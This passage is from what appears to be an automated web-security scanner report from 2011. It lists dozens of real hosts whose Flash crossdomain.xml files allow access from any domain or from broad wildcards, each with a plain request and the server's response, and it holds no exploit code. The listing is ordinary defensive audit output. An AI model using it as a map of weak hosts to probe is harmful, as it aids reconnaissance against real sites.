<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

4.40. http://puma.vizu.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://puma.vizu.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: puma.vizu.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:18:31 GMT
Server: PWS/1.7.2.3
X-Px: ms iad-agg-n23 ( iad-agg-n33), ht iad-agg-n33.panthercdn.com
ETag: "9c515-10d-8b2eaf40"
P3P: CP="DSP NID OTP UNR STP NON", policyref="/w3c/p3p.xml"
Cache-Control: max-age=604800
Expires: Fri, 17 Jun 2011 00:45:38 GMT
Age: 343973
Content-Length: 269
Content-Type: text/xml
Last-Modified: Thu, 09 Jun 2011 20:46:13 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-
...[SNIP]...

4.41. http://s.gravatar.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Date: Tue, 14 Jun 2011 00:30:11 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: nginx
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.42. http://secure-us.imrworldwide.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:13:55 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Tue, 21 Jun 2011 00:13:55 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

4.43. http://spd.pointroll.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://spd.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: spd.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:13a5"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 14 Jun 2011 00:19:16 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

4.44. http://spe.atdmt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://spe.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 207
Allow: GET
Expires: Tue, 14 Jun 2011 20:13:55 GMT
Date: Mon, 13 Jun 2011 17:46:12 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

4.45. http://speed.pointroll.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:51d"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 00:19:17 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

4.46. http://static0.fluxstatic.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static0.fluxstatic.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: static0.fluxstatic.com

Response

HTTP/1.0 200 OK
Content-Length: 183
Content-Type: text/xml
Last-Modified: Tue, 16 Nov 2010 08:32:46 GMT
Accept-Ranges: bytes
ETag: "3cae68d86885cb1:400"
Server: Microsoft-IIS/6.0
Server: s02s
Cache-Control: max-age=2273420
Date: Tue, 14 Jun 2011 00:27:53 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <allow-access-from domain="*"/>
   <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

4.47. http://static1.fluxstatic.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static1.fluxstatic.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: static1.fluxstatic.com

Response

HTTP/1.0 200 OK
Content-Length: 183
Content-Type: text/xml
Last-Modified: Tue, 16 Nov 2010 08:32:46 GMT
Accept-Ranges: bytes
ETag: "3cae68d86885cb1:400"
Server: Microsoft-IIS/6.0
Server: s02s
Cache-Control: max-age=2273676
Date: Tue, 14 Jun 2011 00:20:23 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <allow-access-from domain="*"/>
   <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

4.48. http://static2.fluxstatic.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static2.fluxstatic.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: static2.fluxstatic.com

Response

HTTP/1.0 200 OK
Content-Length: 183
Content-Type: text/xml
Last-Modified: Tue, 16 Nov 2010 08:32:46 GMT
Accept-Ranges: bytes
ETag: "3cae68d86885cb1:400"
Server: Microsoft-IIS/6.0
Server: s02s
Cache-Control: max-age=2273413
Date: Tue, 14 Jun 2011 00:28:00 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <allow-access-from domain="*"/>
   <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

4.49. http://static3.fluxstatic.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static3.fluxstatic.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: static3.fluxstatic.com

Response

HTTP/1.0 200 OK
Content-Length: 183
Content-Type: text/xml
Last-Modified: Tue, 16 Nov 2010 08:32:46 GMT
Accept-Ranges: bytes
ETag: "3cae68d86885cb1:400"
Server: Microsoft-IIS/6.0
Server: s02s
Cache-Control: max-age=2273213
Date: Tue, 14 Jun 2011 00:28:06 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <allow-access-from domain="*"/>
   <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

4.50. http://t.flux.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://t.flux.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: t.flux.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 23 May 2011 07:10:47 GMT
Accept-Ranges: bytes
ETag: "b32e768a1819cc1:0"
Server: Microsoft-IIS/7.0
Server: w01r
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
App: wt
Date: Tue, 14 Jun 2011 00:19:51 GMT
Connection: keep-alive
Content-Length: 247

...<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only"/>
   <allow-access-from domain="*"/>
   <allow-http-request-headers-from d
...[SNIP]...

4.51. http://t.pointroll.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://t.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: t.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Wed, 29 Dec 2010 22:37:57 GMT
Accept-Ranges: bytes
ETag: "ef855aa9a7cb1:56f"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Mon, 13 Jun 2011 14:43:00 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

4.52. http://tcr.tynt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tcr.tynt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tcr.tynt.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=1800
Content-Type: text/xml
Date: Tue, 14 Jun 2011 00:13:56 GMT
ETag: "251523935"
Expires: Tue, 14 Jun 2011 00:43:56 GMT
Last-Modified: Tue, 10 Nov 2009 16:25:33 GMT
Server: EOS (lax001/54D7)
X-Cache: HIT
Content-Length: 201
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

4.53. http://viamtv.112.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://viamtv.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: viamtv.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 17:45:09 GMT
Server: Omniture DC/2.0.0
xserver: www118
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.54. http://widgets.flux.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.flux.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: widgets.flux.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 23 May 2011 07:10:46 GMT
Accept-Ranges: bytes
ETag: "439786891819cc1:0"
Server: Microsoft-IIS/7.0
Server: w09g
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
App: wg
Date: Tue, 14 Jun 2011 00:27:48 GMT
Connection: keep-alive
Content-Length: 247

...<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only"/>
   <allow-access-from domain="*"/>
   <allow-http-request-headers-from d
...[SNIP]...

4.55. http://widgetsak.flux.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgetsak.flux.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: widgetsak.flux.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Mon, 23 May 2011 08:22:36 GMT
ETag: "c593c6922219cc1:0"
Server: Microsoft-IIS/7.0
Server: w10g
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
App: wg
Cteonnt-Length: 247
Cache-Control: max-age=600
Date: Tue, 14 Jun 2011 00:28:19 GMT
Content-Length: 247
Connection: close

...<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only"/>
   <allow-access-from domain="*"/>
   <allow-http-request-headers-from d
...[SNIP]...

4.56. http://www.forexfactory.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.forexfactory.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.forexfactory.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 12:01:41 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 27 May 2011 19:47:06 GMT
ETag: "885e44-67-4a44733d3e280"
Accept-Ranges: bytes
Content-Length: 103
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

4.57. http://www.mtv.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mtv.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Tue, 15 Apr 2008 20:18:17 GMT
ETag: "4b5484c-117-44aef19c7b440"
Accept-Ranges: bytes
Content-Length: 279
Content-Type: application/xml
Cache-Control: max-age=600
Date: Mon, 13 Jun 2011 17:45:32 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" secure="false" />
   <al
...[SNIP]...

4.58. http://ad.wsod.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.wsod.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 14:11:24 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Tue, 16 Feb 2010 21:38:42 GMT
ETag: "abe2fa-20a-47fbe8ebb5c80"
Accept-Ranges: bytes
Content-Length: 522
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="
...[SNIP]...
<allow-access-from domain="*.wsod.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wallst.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wsodqa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msads.net" secure="false" />
...[SNIP]...

4.59. http://advertising.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://advertising.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: advertising.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:20:38 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT
Accept-Ranges: bytes
Content-Length: 228
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

4.60. http://api.tweetmeme.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.tweetmeme.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.tweetmeme.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 14 Jun 2011 00:21:20 GMT
Content-Type: text/xml; charset='utf-8'
Connection: close
P3P: CP="CAO PSA"
Expires: Tue, 14 Jun 2011 00:22:51 +0000 GMT
Etag: 9830c9adda5d9776da5ef86599d624cb
X-Served-By: h02

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.break.com" secure="true"/><allow-access-from domain="*.nextpt.com" secure="true"/>
...[SNIP]...

4.61. http://cm.mtv.overture.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cm.mtv.overture.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cm.mtv.overture.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:18:18 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 03 May 2011 10:14:38 GMT
Accept-Ranges: bytes
Content-Length: 639
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="stage.mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.yimg.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.overture.com" />
...[SNIP]...

4.62. http://feeds.bbci.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Mon, 13 Jun 2011 14:47:54 GMT
Date: Mon, 13 Jun 2011 14:45:54 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

4.63. http://geo.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://geo.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: geo.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:20:37 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

4.64. http://googleads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Mon, 13 Jun 2011 21:32:05 GMT
Expires: Tue, 14 Jun 2011 21:32:05 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 9888
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
